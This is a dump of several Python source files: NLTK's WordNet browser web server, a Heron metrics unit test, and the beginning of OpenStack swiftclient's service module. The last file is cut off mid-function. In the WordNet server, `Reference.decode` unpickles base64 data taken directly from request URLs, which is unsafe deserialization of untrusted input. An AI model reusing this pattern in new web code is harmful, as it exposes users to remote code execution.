if usp == 'NLTK Wordnet Browser Database Info.html':
word = '* Database Info *'
if os.path.isfile(usp):
with open(usp, 'r') as infile:
page = infile.read()
else:
page = (
(html_header % word) + '<p>The database info file:'
'<p><b>'
+ usp
+ '</b>'
+ '<p>was not found. Run this:'
+ '<p><b>python dbinfo_html.py</b>'
+ '<p>to produce it.'
+ html_trailer
)
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = 'text/html'
parts = (sp.split("?")[1]).split("&")
word = [
p.split("=")[1].replace("+", " ")
for p in parts
if p.startswith("nextWord")
][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
# TODO add a variation of this that takes a non ecoded word or MWE.
type = 'text/html'
sp = sp[len("lookup_") :]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = 'text/html'
page, word = page_from_word("wordnet")
else:
type = 'text/plain'
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode('utf8'))
def send_head(self, type=None):
self.send_response(200)
self.send_header('Content-type', type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n"
% (self.address_string(), self.log_date_time_string(), format % args)
)
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind('%23')
if pos != -1:
return int(sp[(pos + 3) :])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. they
# should idealy be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shutsdown the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfreasable.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
sys.stderr.write("Couldn't open %s for writing: %s", logfilename, e)
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = 'http://localhost:' + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(('', port), MyServerHandler)
if logfile:
logfile.write('NLTK Wordnet browser server running serving: %s\n' % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new=2, autoraise=1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN, 'N', 'noun'),
(wn.VERB, 'V', 'verb'),
(wn.ADJ, 'J', 'adj'),
(wn.ADV, 'R', 'adv'),
]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == 's':
pos_tuple = ('a', pos_tuple[1], pos_tuple[2])
for n, x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]:
return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas if l.name == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return (
(HYPONYM, 'Hyponyms', synset.hyponyms()),
(INSTANCE_HYPONYM, 'Instance hyponyms', synset.instance_hyponyms()),
(HYPERNYM, 'Direct hypernyms', synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM, 'Instance hypernyms', synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, 'Part holonyms', synset.part_holonyms()),
(PART_MERONYM, 'Part meronyms', synset.part_meronyms()),
(SUBSTANCE_HOLONYM, 'Substance holonyms', synset.substance_holonyms()),
(SUBSTANCE_MERONYM, 'Substance meronyms', synset.substance_meronyms()),
(MEMBER_HOLONYM, 'Member holonyms', synset.member_holonyms()),
(MEMBER_MERONYM, 'Member meronyms', synset.member_meronyms()),
(ATTRIBUTE, 'Attributes', synset.attributes()),
(ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.VERB:
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, 'Hyponym', synset.hyponyms()),
(HYPERNYM, 'Direct hypernyms', synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
(ENTAILMENT, 'Entailments', synset.entailments()),
(CAUSE, 'Causes', synset.causes()),
(ALSO_SEE, 'Also see', synset.also_sees()),
(VERB_GROUP, 'Verb Groups', synset.verb_groups()),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.ADJ or synset.pos == wn.ADJ_SAT:
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, 'Similar to', synset.similar_tos()),
# Participle of verb - not supported by corpus
(
PERTAINYM,
'Pertainyms',
lemma_property(word, synset, lambda l: l.pertainyms()),
),
(ATTRIBUTE, 'Attributes', synset.attributes()),
(ALSO_SEE, 'Also see', synset.also_sees()),
)
elif synset.pos() == wn.ADV:
# This is weird. adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.a
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''
html_trailer = '''
</body>
</html>
'''
explanation = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt):
return '<b>%s</b>' % txt
def _center(txt):
return '<center>%s</center>' % txt
def _hlev(n, txt):
return '<h%d>%s</h%d>' % (n, txt, n)
def _italic(txt):
return '<i>%s</i>' % txt
def _li(txt):
return '<li>%s</li>' % txt
def pg(word, body):
'''
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
'''
return (html_header % word) + body + html_trailer
def _ul(txt):
return '<ul>' + txt + '</ul>'
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold('<br>' * 10 + '*' * 10 + ' ' + txt + ' ' + '*' * 10))
full_hyponym_cont_text = _ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset, this can be
retrived via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
'''
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
'''
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = 'S'
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace('_', ' ')
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ', '.join(format_lemma(l.name()) for l in synset.lemmas())
gl = " (%s) <i>%s</i> " % (
synset.definition(),
"; ".join("\"%s\"" % e for e in synset.examples()),
)
return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return '<ul>%s\n</ul>\n' % ''.join(
(
_collect_one_synset(word, synset, synset_relations)
for synset in wn.synsets(word, pos)
)
)
def _synset_relations(word, synset, synset_relations):
'''
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
'''
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % (
relation_html(r[0]),
''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]),
)
else:
raise TypeError(
"r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
% (type(r), r)
)
def make_synset_html(db_name, disp_name, rels):
synset_html = '<i>%s</i>\n' % make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name,
)
if db_name in ref.synset_relations[synset.name()]:
synset_html += '<ul>%s</ul>\n' % ''.join(
"<li>%s</li>\n" % relation_html(r) for r in rels
)
return synset_html
html = (
'<ul>'
+ '\n'.join(
(
"<li>%s</li>" % make_synset_html(*rel_data)
for rel_data in get_relations_data(word, synset)
if rel_data[2] != []
)
)
+ '</ul>'
)
return html
class Reference(object):
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifaiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return a HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
word = href.word
pos_forms = defaultdict(list)
words = word.split(',')
words = [w for w in [w.strip().lower().replace(' ', '_') for w in words] if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ''
for pos, pos_str, name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + '\n'
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page,
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>"
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(
argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
)
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
app()
__all__ = ['app']
|
global_metrics_unittest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring
import unittest
import threading
from heronpy.api import global_metrics
import heron.instance.tests.python.utils.mock_generator as mock_generator
class GlobalMetricsTest(unittest.TestCase):
def setUp(self):
self.metrics_collector = mock_generator.MockMetricsCollector()
global_metrics.init(self.metrics_collector, 10)
self.lock = threading.Lock()
def test_normal(self):
global_metrics.incr("mycounter_a")
global_metrics.incr("mycounter_b", 3)
global_metrics.safe_incr("mycounter_c", 5)
counter = global_metrics.metricsContainer
d = counter.get_value_and_reset()
self.assertTrue("mycounter_a" in d)
self.assertTrue("mycounter_b" in d)
self.assertTrue("mycounter_c" in d)
self.assertEqual(d["mycounter_a"], 1)
self.assertEqual(d["mycounter_b"], 3)
self.assertEqual(d["mycounter_c"], 5)
def concurrent_incr(self):
def incr_worker():
global_metrics.safe_incr("K")
global_metrics.safe_incr("K", 2)
global_metrics.safe_incr("K", 3)
threads = []
for i in range(10):
t = threading.Thread(target=incr_worker)
threads.append(t)
t.start()
for t in threads:
t.join()
counter = global_metrics.metricsContainer
d = counter.get_value_and_reset()
self.assertTrue("K" in d)
self.assertEqual(d["K"], 60)
def test_concurrent_incr(self):
for i in range(100):
global_metrics.metricsContainer.get_value_and_reset()
self.concurrent_incr()
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import StringIO, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
from six import Iterator, string_types
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
